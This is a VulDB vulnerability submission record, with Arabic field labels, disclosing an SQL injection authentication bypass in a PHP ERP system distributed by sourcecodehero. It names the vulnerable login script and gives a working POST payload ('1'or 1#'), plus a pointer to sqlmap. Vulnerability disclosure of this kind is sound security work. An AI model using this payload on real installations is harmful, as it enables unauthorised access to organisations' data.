| عنوان | ERP System Project in PHP Sql Injection |
|---|
| الوصف | ERP System Project in PHP is a Self-Hosted ERP System with a plethora of functions to help you manage your organization operations.
https://sourcecodehero.com/erp-system-project-in-php-free-download-with-source-code/
https://www.phptpoint.com/projects/erp-system-project-in-php-free-download/
The vulnerability allows remote attackers to execute arbitrary SQL commands and bypass the authentication.
in /pages/processlogin.php
POST: btnlogin=1&user=1'or 1#&password=1
(or use sqlmap to exploit 'user' parameter) |
|---|
| المصدر | ⚠️ https://s2.loli.net/2022/09/02/N4FESXldmKWvQOw.png |
|---|
| المستخدم | kingbridge (UID 31583) |
|---|
| ارسال | 02/09/2022 05:16 PM (4 سنوات منذ) |
|---|
| الاعتدال | 03/09/2022 08:45 AM (15 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 207845 [Sourcecodehero ERP System Project /pages/processlogin.php المستخدم حقن SQL] |
|---|
| النقاط | 20 |
|---|